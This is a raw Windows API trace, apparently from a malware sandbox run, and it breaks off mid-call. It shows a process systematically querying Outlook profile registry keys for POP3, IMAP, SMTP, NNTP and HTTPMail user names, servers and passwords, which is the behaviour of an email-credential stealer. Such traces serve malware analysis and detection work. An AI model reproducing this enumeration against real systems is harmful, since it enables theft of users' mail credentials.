0x0 [0236.610] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.610] RegQueryValueExW (in: hKey=0x558, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.610] RegCloseKey (hKey=0x558) returned 0x0 [0236.610] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.610] RegQueryValueExW (in: hKey=0x558, lpValueName="Email", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.610] RegCloseKey (hKey=0x558) returned 0x0 [0236.610] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.610] RegQueryValueExW (in: hKey=0x558, lpValueName="HTTP User", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.610] RegCloseKey (hKey=0x558) returned 0x0 [0236.610] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.610] RegQueryValueExW (in: hKey=0x558, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.610] RegCloseKey (hKey=0x558) returned 0x0 [0236.611] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.611] RegQueryValueExW (in: hKey=0x558, lpValueName="POP3 User", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.611] RegCloseKey (hKey=0x558) returned 0x0 [0236.611] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.611] RegQueryValueExW (in: hKey=0x558, lpValueName="IMAP User", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.611] RegCloseKey (hKey=0x558) returned 0x0 [0236.611] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.611] RegQueryValueExW (in: hKey=0x558, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.611] RegCloseKey (hKey=0x558) returned 0x0 [0236.611] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.611] RegQueryValueExW (in: hKey=0x558, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.611] RegCloseKey (hKey=0x558) returned 0x0 [0236.611] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.612] RegQueryValueExW (in: hKey=0x558, lpValueName="SMTP User", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.612] RegCloseKey (hKey=0x558) returned 0x0 [0236.612] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.612] RegQueryValueExW (in: hKey=0x558, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.612] RegCloseKey (hKey=0x558) returned 0x0 [0236.612] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.612] RegQueryValueExW (in: hKey=0x558, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.612] RegCloseKey (hKey=0x558) returned 0x0 [0236.612] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.612] RegQueryValueExW (in: hKey=0x558, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.612] RegCloseKey (hKey=0x558) returned 0x0 [0236.612] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.613] RegQueryValueExW (in: hKey=0x558, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.613] RegCloseKey (hKey=0x558) returned 0x0 [0236.613] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.613] RegQueryValueExW (in: hKey=0x558, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.613] RegCloseKey (hKey=0x558) returned 0x0 [0236.613] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.613] RegQueryValueExW (in: hKey=0x558, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.613] RegCloseKey (hKey=0x558) returned 0x0 [0236.613] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.613] RegQueryValueExW (in: hKey=0x558, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.613] RegCloseKey (hKey=0x558) returned 0x0 [0236.613] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.613] RegQueryValueExW (in: hKey=0x558, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.614] RegCloseKey (hKey=0x558) returned 0x0 [0236.614] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.614] RegQueryValueExW (in: hKey=0x558, lpValueName="HTTPMail Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.614] RegCloseKey (hKey=0x558) returned 0x0 [0236.614] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.614] RegQueryValueExW (in: hKey=0x558, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.614] RegCloseKey (hKey=0x558) returned 0x0 [0236.614] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x615c16c | out: phkResult=0x615c16c*=0x558) returned 0x0 [0236.614] RegQueryInfoKeyW (in: hKey=0x558, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x615c19c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c198, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x615c19c*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c198*=0x7, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.695] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.696] RegQueryValueExW (in: hKey=0x4a4, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.696] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.696] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.696] RegQueryValueExW (in: hKey=0x4a4, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x1, lpData=0x0, lpcbData=0x615c15c*=0xa) returned 0x0 [0236.696] RegQueryValueExW (in: hKey=0x4a4, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x615c160, lpData=0x26cb284, lpcbData=0x615c15c*=0xa | out: lpType=0x615c160*=0x1, lpData="hthr", lpcbData=0x615c15c*=0xa) returned 0x0 [0236.696] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.705] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.705] RegQueryValueExW (in: hKey=0x4a4, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x1, lpData=0x0, lpcbData=0x615c15c*=0xc) returned 0x0 [0236.705] RegQueryValueExW (in: hKey=0x4a4, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x615c160, lpData=0x26cc310, lpcbData=0x615c15c*=0xc | out: lpType=0x615c160*=0x1, lpData="fgerh", lpcbData=0x615c15c*=0xc) returned 0x0 [0236.705] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.708] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.708] RegQueryValueExW (in: hKey=0x4a4, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.708] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.708] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.708] RegQueryValueExW (in: hKey=0x4a4, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.709] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.709] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.709] RegQueryValueExW (in: hKey=0x4a4, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.709] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.710] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.710] RegQueryValueExW (in: hKey=0x4a4, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.710] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.710] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.710] RegQueryValueExW (in: hKey=0x4a4, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.711] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.711] RegQueryValueExW (in: hKey=0x4a4, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.711] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.712] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.712] RegQueryValueExW (in: hKey=0x4a4, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.712] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.712] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.713] RegQueryValueExW (in: hKey=0x4a4, lpValueName="Email", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x1, lpData=0x0, lpcbData=0x615c15c*=0x1e) returned 0x0 [0236.713] RegQueryValueExW (in: hKey=0x4a4, lpValueName="Email", lpReserved=0x0, lpType=0x615c160, lpData=0x26cdc60, lpcbData=0x615c15c*=0x1e | out: lpType=0x615c160*=0x1, lpData="sdjwh@dive.djh", lpcbData=0x615c15c*=0x1e) returned 0x0 [0236.713] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.718] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.718] RegQueryValueExW (in: hKey=0x4a4, lpValueName="HTTP User", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.718] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.718] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.718] RegQueryValueExW (in: hKey=0x4a4, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.718] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.719] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.719] RegQueryValueExW (in: hKey=0x4a4, lpValueName="POP3 User", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x1, lpData=0x0, lpcbData=0x615c15c*=0x1e) returned 0x0 [0236.719] RegQueryValueExW (in: hKey=0x4a4, lpValueName="POP3 User", lpReserved=0x0, lpType=0x615c160, lpData=0x26ce974, lpcbData=0x615c15c*=0x1e | out: lpType=0x615c160*=0x1, lpData="sdjwh@dive.djh", lpcbData=0x615c15c*=0x1e) returned 0x0 [0236.719] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.720] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.720] RegQueryValueExW (in: hKey=0x4a4, lpValueName="IMAP User", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.720] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.721] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.721] RegQueryValueExW (in: hKey=0x4a4, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.721] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.721] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.721] RegQueryValueExW (in: hKey=0x4a4, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.721] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.722] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.722] RegQueryValueExW (in: hKey=0x4a4, lpValueName="SMTP User", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.722] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.723] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.723] RegQueryValueExW (in: hKey=0x4a4, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.723] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.723] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.723] RegQueryValueExW (in: hKey=0x4a4, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.723] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.726] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.726] RegQueryValueExW (in: hKey=0x4a4, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.726] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.727] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.727] RegQueryValueExW (in: hKey=0x4a4, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.727] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.727] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x4a4) returned 0x0 [0236.727] RegQueryValueExW (in: hKey=0x4a4, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.727] RegCloseKey (hKey=0x4a4) returned 0x0 [0236.728] RegOpenKeyExW (in: hKey=0x80000001, 